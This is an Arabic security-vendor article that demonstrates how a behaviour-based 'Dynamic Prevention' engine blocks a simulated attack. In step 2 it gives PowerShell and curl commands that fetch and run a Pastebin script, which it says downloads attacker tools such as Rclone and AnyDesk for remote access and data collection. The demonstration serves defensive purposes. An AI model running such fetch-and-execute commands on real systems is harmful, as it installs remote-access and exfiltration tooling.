""إظهار كيف تحمي الوقاية الديناميكية شبكتك

نظرة عامة

""الوقاية الديناميكية هي محرك أمان يعتمد على السلوك يقوم بتطبيق ضوابط ديناميكية استباقية استجابةً للتهديدات المكتشفة لتقليل مساحة الهجوم والتخفيف من التهديدات مبكرًا قبل أن يحدث أي تأثير ""لمزيد من المعلومات، انظر ما هي الوقاية الديناميكية؟

هذه المقالة تحاكي سيناريو هجوم حقيقي لتوضيح كيف تحمي الوقاية الديناميكية شبكتك ""في هذا المثال، يقوم المستخدم بتحميل سكريبت من Pastebin يستخدمه المهاجم لمحاولة استرداد أدوات عالية الخطورة مطلوبة لتنفيذ هجوم مستقبلي ""تقوم الوقاية الديناميكية بتحديد السلوك الضار وتمنع تنزيل الأداة، مما يمنع الهجوم قبل أن يتقدم أو يحدث أي تأثير

الاستجابة لهذا الهجوم مؤتمتة بالكامل لا توجد قواعد إضافية مطلوبة ""مجرد تمكين الوقاية الديناميكية يكون كافيًا لمنع الهجوم

""لمحاكاة هذا الهجوم:

  1. ""تحميل أداة عالية الخطورة بدون أن يتم حجبها
  2. تحميل السكريبت من Pastebin
  3. ""حاول مرة أخرى تنزيل الأدوات عالية الخطورة ""هذه المرة يتم حجب التنزيل

المتطلبات المسبقة

  • ""الوقاية الديناميكية ممكنة مع ضبط الإجراءات على حجب

الخطوة 1: تنزيل أداة عالية الخطورة

""لإظهار أن الوقاية الديناميكية تحجب الإجراءات فقط عندما تكون جزءًا من سلسلة خبيثة، قم أولاً بتنزيل Rclone، وهي أداة سطر أوامر مفتوحة المصدر لإدارة الملفات ""غالبًا ما يستخدم المهاجمون Rclone كأداة ما بعد الاختراق لأنها شرعية وقوية وتندمج مع النشاط الإداري الطبيعي

الإجراء

تحميل Rclone من أحد الخيارات التالية:

  • ""عنوان URL التالي: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • على أجهزة Windows:

    • ""أمر PowerShell التالي: Open-InBrowser -Url \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -Label \"RClone\"

  • على أجهزة macOS/Linux:

    • ""الأمر التالي لـ Terminal: curl -sSL \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\"

النتيجة

""يتم تحميل الملف بنجاح

الشرح

""هذا يؤكد أن العملية غير محجوبة عندما تكون منفردة لأنها لا تعتبر ضارة عندما لا تسبقها أي نشاط مريب

الخطوة 2: تنزيل برنامج نصي من Pastebin

""لمحاكاة بدء هجوم، قم بتحميل سكريبت من Pastebin الذي، عند تنفيذه، يقوم بتحميل أدوات المهاجمين الشائعة، مثل Rclone و AnyDesk للوصول عن بعد وجمع البيانات

الإجراء

""تحميل وتشغيل السكريبت من Pastebin:

  • على أجهزة Windows:

    • ""أمر PowerShell التالي: (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/C5VxKUpE')

  • على أجهزة macOS/Linux:

    • ""الأمر التالي لـ Terminal: curl -sSL \"https://pastebin.com/raw/tXhVK2V7\"

النتيجة

""يعمل السكريبت ويقوم بتحميل الأدوات ""يتم تطبيق تحكم ديناميكي على الجهاز المضيف، ويظهر في لوحة معلومات التهديدات في أداة المضيف مع التحكم ""لمزيد من المعلومات، انظر استخدام لوحة معلومات التهديدات الأمنية

Dynamic_Prevention1.png

الشرح

""تكتشف الوقاية الديناميكية مؤشرات السلوك المشبوه وتفرض ضوابط بشكل استباقي لحجب الإجراءات الضارة اللاحقة، مما يوقف الهجوم قبل حدوث أي تأثير

الخطوة 3: تنزيل أداة عالية الخطورة

""في الهجوم المحاكى، يحاول المهاجم تنزيل Rclone ""ومع ذلك، لأن هذا الإجراء يتبع نشاطًا مشبوهًا بتنزيل السكريبت من Pastebin ويتم تطبيق تحكم، تقوم الوقاية الديناميكية بحجب تنزيل Rclone

الإجراء

تحميل Rclone من أحد الخيارات التالية:

  • ""عنوان URL التالي: https://downloads.rclone.org/rclone-current-windows-amd64.zip

  • على أجهزة Windows:

    • ""أمر PowerShell التالي: Open-InBrowser -Url \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\" -Label \"RClone\"

  • على أجهزة macOS/Linux:

    • ""الأمر التالي لـ Terminal: curl -sSL \"https://downloads.rclone.org/rclone-current-windows-amd64.zip\"

النتيجة

""يتم حجب تحميل هذا الملف بواسطة التحكم ""يظهر التهديد الذي تم تخفيفه في لوحة معلومات التهديدات في أداة المضيف مع تهديدات مخففة

DP5.png

الشرح

""على عكس الخطوة 1، حيث تم تشغيل هذا السكريبت منفردًا وبالتالي تم السماح به، فإن تنزيل هذا السكريبت سبقته عملية مشبوهة ويتم حجبها بواسطة الوقاية الديناميكية

عرض

هذا الفيديو يظهر عرضاً لهذا الهجوم المحاكى:

هل كان هذا المقال مفيداً؟

0 من 0 وجدوا هذا مفيداً

لا توجد تعليقات